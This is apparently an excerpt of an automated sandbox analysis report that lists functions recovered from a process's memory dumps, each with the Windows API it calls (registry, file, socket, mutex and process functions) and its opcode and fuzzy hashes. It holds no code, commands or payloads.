Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 404746a30de7769523dc90d609603f93d1449b52ac0bb66849f9e3d929dbd5a6
Instruction ID: a1333e78acb96d08c8cfe1ea55fe1f7f5206348d36e574d82cd519d46a0d77e4
Opcode Fuzzy Hash: 404746a30de7769523dc90d609603f93d1449b52ac0bb66849f9e3d929dbd5a6
Instruction Fuzzy Hash: FD3106728053846FEB11CB15DC85BA6FFA8EF46320F1880AEE9449B252D3756509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06092AE7, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 06092BBB

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 1617484adf00f2d598753caaead5b729b832e6b69bb700fa71393e81c0dda998
Instruction ID: ae22179fe8809f434f73d7ccb3620a3b425bddce21ae43fd0f962cf4737f90e5
Opcode Fuzzy Hash: 1617484adf00f2d598753caaead5b729b832e6b69bb700fa71393e81c0dda998
Instruction Fuzzy Hash: DD31A371504380AFEB218F25CC44FA6BFACEF45710F14899EE9849B182D275A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0632ED37, Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0632EDD8

Memory Dump Source

Source File: 00000002.00000002.509917703.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df651705f63ce97fcef6248262f1130ce1c5ad5a827e1a7c49b1690c99011ed4
Instruction ID: fd79996fa1d4f97079bae4a48479deac53f714928619adb3754898a9d59348a2
Opcode Fuzzy Hash: df651705f63ce97fcef6248262f1130ce1c5ad5a827e1a7c49b1690c99011ed4
Instruction Fuzzy Hash: DB31FC34E1125A8FDB44DBB4D8457AEBFB2EF86304F14C4AAD001EB291DB358886CB95

Uniqueness

Uniqueness Score: -1.00%

Function 06090E04, Relevance: 1.6, APIs: 1, Instructions: 96fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 06090EB1

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4fe3ba977bc4af2bfa7b346d5da180e0866772b69124a9f5cb0b755de68c2287
Instruction ID: e42d2383a336b9265202836b2ef1f51470ba7b83303ee48cb94b20eeeac4797b
Opcode Fuzzy Hash: 4fe3ba977bc4af2bfa7b346d5da180e0866772b69124a9f5cb0b755de68c2287
Instruction Fuzzy Hash: EA317E71544280AFE722CF25DC44B62BFE8EF06610F1884AEE9858B252D375A409DB71

Uniqueness

Uniqueness Score: -1.00%

Function 06092D99, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092E4D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: a19653b499fda55e7d2db885ad76457db9cd62b9b1d1c65cfeebea6c4d5015a8
Instruction ID: 3550ebc5405110761e268669b2d25baccd8efdeabf362f1868927db03d3c524f
Opcode Fuzzy Hash: a19653b499fda55e7d2db885ad76457db9cd62b9b1d1c65cfeebea6c4d5015a8
Instruction Fuzzy Hash: 67319275505780AFEB22CF65DC84F92BFF8EF06310F08849AE9858B162D334A909DB71

Uniqueness

Uniqueness Score: -1.00%

Function 0609180B, Relevance: 1.6, APIs: 1, Instructions: 91registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 060918C0

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 00be75967ce57b1b16c3e8f6f1b51042a9a82f3530f82636a672ba9932b4cb14
Instruction ID: eeb2981f399223b3ac7e190f6de0ace92c7911dff0cf59d0346907345f484790
Opcode Fuzzy Hash: 00be75967ce57b1b16c3e8f6f1b51042a9a82f3530f82636a672ba9932b4cb14
Instruction Fuzzy Hash: 5E31C2725043806FEB22CB65DC45FA7BFE8EF06310F08849AE985DB152D374A508CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 016BA8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 016BA989

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8fa1404974581869c6cb88ff68b4677637bb6ad35747de380fec4cd8983bb366
Instruction ID: d2e9bd98f0f5f4c2477c1fc694577d4cc88947f299ae074cf56138db09987129
Opcode Fuzzy Hash: 8fa1404974581869c6cb88ff68b4677637bb6ad35747de380fec4cd8983bb366
Instruction Fuzzy Hash: 5F31A2725087806FE7228F25DC84FA6FFBCEF05710F08859BE984DB152D224A948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 016BA9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BAA8C

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2cf2a10231a7f41f438ff51c4710dbedc92da39e8e16ee8e8d12675ecf106c58
Instruction ID: 833ecbc3512763bb9c930b16a8e210f02b486591dd1c13f15c87b6dba6ff0af4
Opcode Fuzzy Hash: 2cf2a10231a7f41f438ff51c4710dbedc92da39e8e16ee8e8d12675ecf106c58
Instruction Fuzzy Hash: 8931A4715097846FE722CB65CC85FA2BFE8EF06710F08849AE985CB253D364E949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0609214C, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 060921E3

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 9a9357b5a438edad573367003c07a28e759ccb6ed2527add8e1d81f9e83915b2
Instruction ID: 31f70f417cd06122d1a820292afc47c37f3538eb4165da2b7c3fce59c4a71220
Opcode Fuzzy Hash: 9a9357b5a438edad573367003c07a28e759ccb6ed2527add8e1d81f9e83915b2
Instruction Fuzzy Hash: 0A318F725043846FEB22CF65DC45FA6BFE8EF45720F0884AAED84DB152D274A918CB71

Uniqueness

Uniqueness Score: -1.00%

Function 016BB21C, Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BB2B0

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f9501eb5b2f11c3b66b497c8daa1fb2e57d9077208b5445ae6458a00fd45d502
Instruction ID: ea898207e09c6389995e7dd2a019f1854ff2cfa61a34c62189ffdc2e955f1894
Opcode Fuzzy Hash: f9501eb5b2f11c3b66b497c8daa1fb2e57d9077208b5445ae6458a00fd45d502
Instruction Fuzzy Hash: 2621E7725093806FE7128B25DC45BA6BFB8EF46320F0884EBE944DF193D2649949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0609204E, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 060920F8

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 967203342e737943a86ba2ade7db431a59c908e39a8c125159d74fa722146bdf
Instruction ID: 341cb3df70cc121778b4438cfb952f5d179b498aadc44ef354e6aea177ffa1df
Opcode Fuzzy Hash: 967203342e737943a86ba2ade7db431a59c908e39a8c125159d74fa722146bdf
Instruction Fuzzy Hash: 3731B1725093806FEB22CB25DC40F92BFF8EF06310F0884DAE985DB193D264A548CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06092E97, Relevance: 1.6, APIs: 1, Instructions: 87networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092F3E

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 06a0242cdfd54723c8391363a07404543b50f676b70b0af5fd5ce4f5ebe1344a
Instruction ID: e57c234b5ebfce0cddcff1e6d0387b71f6855c6fed80f34ac4247de4cb8aa2d9
Opcode Fuzzy Hash: 06a0242cdfd54723c8391363a07404543b50f676b70b0af5fd5ce4f5ebe1344a
Instruction Fuzzy Hash: 8631BF724093846FEB128B26DC55B96BFA8EF06314F0884EBE984DB153D224A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 060923E4, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 06092496

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: e716cc80049181cf0f64a0018abeca2292dc2331ed9a49109679f81a7dcca4bb
Instruction ID: aaf8ba25f075dcc64898a317fb98f9048a4f2f94170c1b5db9d94848bfbbdef6
Opcode Fuzzy Hash: e716cc80049181cf0f64a0018abeca2292dc2331ed9a49109679f81a7dcca4bb
Instruction Fuzzy Hash: BD3193B2404784AFE722CB55DC45F96FFF8EF05320F08859EE9848B192D365A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 016BB309, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 016BB3B6

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 0ebef486ad018a36050ee24782095e0ba83f1bd7025e8956cad5f525a38e758a
Instruction ID: e56551dbd5abce3048ec5853f7892b57a1141c4ca18164ec5fb7e15f5673becf
Opcode Fuzzy Hash: 0ebef486ad018a36050ee24782095e0ba83f1bd7025e8956cad5f525a38e758a
Instruction Fuzzy Hash: EB316F7154E3C05FD7139B25CC55A66BFB4EF87610F0980DBDC848F2A3D624A919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 06092699, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 06092739

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 932a3614bb141454723cbedc80bdda0d2c215e8a93ab3565aa664b13c30be261
Instruction ID: 92ed984e2a038bbf63c9752e4b1dbdd0e0c606f1b2f123ce573e33ae9294a03f
Opcode Fuzzy Hash: 932a3614bb141454723cbedc80bdda0d2c215e8a93ab3565aa664b13c30be261
Instruction Fuzzy Hash: F5318671509380AFE711CF25DC85B56FFE8EF05210F08849EE984DB252D365E904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06092B16, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 06092BBB

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 7b9e22798e0139433e60fca4cf826dc4fd25778868c60281bd967b500a420b7f
Instruction ID: 398572cb8cc67fb5f16ddad19bfb9420c38ac3be4911ca8fd64e36380bc8c654
Opcode Fuzzy Hash: 7b9e22798e0139433e60fca4cf826dc4fd25778868c60281bd967b500a420b7f
Instruction Fuzzy Hash: 3D21D371540200BFFB309F25DC85FAAFBECEF48710F14885AEE459A181D674A6458BB1

Uniqueness

Uniqueness Score: -1.00%

Function 06091722, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 060917B6

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 0ee77a4af441962cc5e8bdebd28baceb11d94f9c14f8227c4bfae6bbe0112dfa
Instruction ID: 7b13597f6ae52011f9f9deb7f42706d71fd6848ffd5ec82a9d1d81f665e51984
Opcode Fuzzy Hash: 0ee77a4af441962cc5e8bdebd28baceb11d94f9c14f8227c4bfae6bbe0112dfa
Instruction Fuzzy Hash: 4F2180B25057846FEB218F25DC45F66FFA8EF45610F0884AAED44DB152D274A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 016BB711, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BB7A2

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: a219c28c6fb9c9b40f1f259e237b0b84c1f0f770b586eaa955318f865695991e
Instruction ID: d4b8947bc59ed38e2fa2d46c09fd00c945144322e44af8ad56017b5ddcb779f5
Opcode Fuzzy Hash: a219c28c6fb9c9b40f1f259e237b0b84c1f0f770b586eaa955318f865695991e
Instruction Fuzzy Hash: 7F21B5715053846FE712CF25DC85FA6FFACEF46210F0884AAE945DB252D364E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 016BA120, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E2C,?,?), ref: 016BA1C2

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: b7ab29503cb7b9354d36196321b65c749b614f5c9d381361db03ed3b8c9e43db
Instruction ID: 4ed8d86c4f62b7ef1fdf5f23caad680e6c96e6b348e46540ead486d29d48785d
Opcode Fuzzy Hash: b7ab29503cb7b9354d36196321b65c749b614f5c9d381361db03ed3b8c9e43db
Instruction Fuzzy Hash: 8521B17140D3C06FD3128B35CC55B66BFB4EF47610F1985DBD8848F193D229A809CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 016BB808, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 016BB8AE

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 2770cfa76c944ca447da051f1880acf12ddf7c5aa07e14eb6564cf260e787a4f
Instruction ID: b62b16986cdb6304f55159fa7050fcddf2cfdbc5739c06dffadb493a9beef395
Opcode Fuzzy Hash: 2770cfa76c944ca447da051f1880acf12ddf7c5aa07e14eb6564cf260e787a4f
Instruction Fuzzy Hash: 2921AD714093C06FD3128B65DC55B66BFB8EF87610F0980DBD8848B1A3D624A909CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 06092874, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 060928FD

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 6e1783be7863c82f15b0e7fd812a2278fd7799c829d3b0551cccac5f521ff6c8
Instruction ID: df69f6b79663e5891f95965941259b8d6ed13da983c4afca2ed70991a7ec2ca3
Opcode Fuzzy Hash: 6e1783be7863c82f15b0e7fd812a2278fd7799c829d3b0551cccac5f521ff6c8
Instruction Fuzzy Hash: D421B571505380AFEB128F65DC44FA7BFB8EF06310F0884AAE9459B162C235A549CB75

Uniqueness

Uniqueness Score: -1.00%

Function 06090F08, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06090F9D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 23cbd389b0131a733835118c9349a1dc43837db9ca0723d65ecc19f30de01feb
Instruction ID: 8e3c67a020133d6eb137d63c85d8902f19937b91bd597c6878a556105e91125a
Opcode Fuzzy Hash: 23cbd389b0131a733835118c9349a1dc43837db9ca0723d65ecc19f30de01feb
Instruction Fuzzy Hash: 5F213AB64487806FE7128B25DC50BA3BFB8EF46720F0880DAED858B153D224A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 06092302, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 0609238D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: aa0c6771fef750b6d04018fdc42ec78a6bd5806bbcb085c7ed360673df482000
Instruction ID: 475c1c5b4a0afb1432f7e0c53deba24d735f8a8ca7c2ef26f4deabb23f84a8a5
Opcode Fuzzy Hash: aa0c6771fef750b6d04018fdc42ec78a6bd5806bbcb085c7ed360673df482000
Instruction Fuzzy Hash: 1B2160B1505284AFE721CB25DC45F66FFE8EF45210F1884AEED848B292D375A948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06091650, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E2C,?,?), ref: 060916F6

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 5cf1911dc5097efc73875212fd991b8ffa26919ce8bc4c298b0ead44fe1ee441
Instruction ID: d25abac08f01431a93664529e004a805d36b2b97508858ba2fa85af4978f58af
Opcode Fuzzy Hash: 5cf1911dc5097efc73875212fd991b8ffa26919ce8bc4c298b0ead44fe1ee441
Instruction Fuzzy Hash: CC214F6550E3C06FC3138B358C55A26BFB4EF87A10F1D81DFD8848B6A3D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 016BB570, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 016BB60A

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: feb953d09382252dd96b7556a6a8e931125146bf0f3696ee7093d5bfa8436594
Instruction ID: 0b93fc52076603e8f85a37080cbc01611d7befe93d982e6cc4051d12fc855343
Opcode Fuzzy Hash: feb953d09382252dd96b7556a6a8e931125146bf0f3696ee7093d5bfa8436594
Instruction Fuzzy Hash: B821C8755093C06FD3138B25DC51B62BFB8EF87A10F0981DBEC848B653D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 06090E32, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 06090EB1

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: de637648f9de7f7a193e56aeeb91091ced9c88305693d21df95739248e18c9d6
Instruction ID: 60de35d0d8e78e82ef5d82d5e0a16515add57b4d248ede000cd77950801e32f2
Opcode Fuzzy Hash: de637648f9de7f7a193e56aeeb91091ced9c88305693d21df95739248e18c9d6
Instruction Fuzzy Hash: 9E219C71500240AFEB61CF25DC44B66FBE9EF08310F18846EED858B642E371E404CB75

Uniqueness

Uniqueness Score: -1.00%

Function 06092172, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 060921E3

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: cc90918d2ce6d541adab74ab8698c749519a8f8913075a0ac9f99865e9cf777e
Instruction ID: d945a7eafc0fb3abe0549aeea5efb0ac549c07d246c8b687fede52f8a040dc4d
Opcode Fuzzy Hash: cc90918d2ce6d541adab74ab8698c749519a8f8913075a0ac9f99865e9cf777e
Instruction Fuzzy Hash: E221D472500204AFEB20DF29DC45B6AFBECEF44720F04846AED44DB241D274E9548B71

Uniqueness

Uniqueness Score: -1.00%

Function 0609069C, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E2C), ref: 06090737

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6002c2cf6a68b46457eb99640ac76335568354f82570dc5cf031fddb5e5dbcc4
Instruction ID: accdc74f836eab6d9339151139444e4c07caa1dc13d1b05d4493b8ace8aa0940
Opcode Fuzzy Hash: 6002c2cf6a68b46457eb99640ac76335568354f82570dc5cf031fddb5e5dbcc4
Instruction Fuzzy Hash: 7C21F5714487806FE7228B25CC41FA2FFA8DF06720F1880DAED859F192C269A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06092CC6, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092D4F

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 25e6bd4f747932c8197f5dbeb7edb5c628768cbe3ba88da9122012fe63a2f17d
Instruction ID: c0612bed9dd8fa6734f9a65b81ce665577ac0266f51fffae91ada3734e9984cf
Opcode Fuzzy Hash: 25e6bd4f747932c8197f5dbeb7edb5c628768cbe3ba88da9122012fe63a2f17d
Instruction Fuzzy Hash: 8E2183714097846FDB128B65DC85B96BFB8EF46310F0884EBE984DF192D275A508C771

Uniqueness

Uniqueness Score: -1.00%

Function 016BA90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 016BA989

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 405a59cdfb5a1abc598880d8ac0986f3a1e0e04b38906938fc89c19890d384ea
Instruction ID: 0699e57f6d597ce8729ec46d8bb7d3e65826f3fd6540da1088e22aa017835961
Opcode Fuzzy Hash: 405a59cdfb5a1abc598880d8ac0986f3a1e0e04b38906938fc89c19890d384ea
Instruction Fuzzy Hash: 2D21D172500604AFE7219F59DC84FABFBECEF08710F04885AED459B641D270E5488BB1

Uniqueness

Uniqueness Score: -1.00%

Function 016BB636, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 016BB6B2

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 65490c2c61c9da4eec1fca7ac0ecf0b822654087b84c8576a9cefc258b038a62
Instruction ID: 61bad2521cc89d195eda861fb04dee1b50013971a2326295a5886235c1e499e5
Opcode Fuzzy Hash: 65490c2c61c9da4eec1fca7ac0ecf0b822654087b84c8576a9cefc258b038a62
Instruction Fuzzy Hash: 612192725053806FE7128F65DC85FA7FFA8EF45220F0884AAE945DB152D264A848CB71

Uniqueness

Uniqueness Score: -1.00%

Function 06091742, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 060917B6

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 238e188f7fab719ab20c2489ab1433f2e840bb461ee41af5c266e23d5cf58148
Instruction ID: 30f6fdf4d530aa14aa9a8f32e7d6edb9d5727b5b407895d83be0258d5ad28c0a
Opcode Fuzzy Hash: 238e188f7fab719ab20c2489ab1433f2e840bb461ee41af5c266e23d5cf58148
Instruction Fuzzy Hash: C221A171A40204AFEB209F25DC45F6AFFE8EF44720F14846AED449B641D274E4088B71

Uniqueness

Uniqueness Score: -1.00%

Function 06092F88, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 0609301D

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: f14849eff89536f68b59236c262fe4a0b9b68c42be9edb13e60513852a84da8c
Instruction ID: 8da677491db552e5a20efd4dd5f7d065b7271981f113870f0a1a6fe60f69d5d2
Opcode Fuzzy Hash: f14849eff89536f68b59236c262fe4a0b9b68c42be9edb13e60513852a84da8c
Instruction Fuzzy Hash: B621D372408380AFEB228B15DC44FA6FFB8EF46310F09849EE9849B163C265A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 016BACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 016BAD6A

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d6147fae7ef23af1fb92c8f9a11562ae0194d9bac541b303b4bc0d3e11fc65c7
Instruction ID: 976e89f14c5023d3fb65e5b235fea646c41f41484c7eada3a3a7d4b03191d915
Opcode Fuzzy Hash: d6147fae7ef23af1fb92c8f9a11562ae0194d9bac541b303b4bc0d3e11fc65c7
Instruction Fuzzy Hash: BC2180765093805FD7128B65DC85B96BFA8EF06210F0984EAD985CF263D335D848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 060926C6, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 06092739

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 0176ba3df81a561601e8588041f70da4557414e1ad2423ffaaa5516efb0e467c
Instruction ID: a57e5c60614cacc00c08904a2ffa07034ea045e8c08896aa1e63d4a27e0940e5
Opcode Fuzzy Hash: 0176ba3df81a561601e8588041f70da4557414e1ad2423ffaaa5516efb0e467c
Instruction Fuzzy Hash: 70219F71604240AFEB60DF25DD85B66FFE8EF04310F18846AED849B241D375E505CBB1

Uniqueness

Uniqueness Score: -1.00%

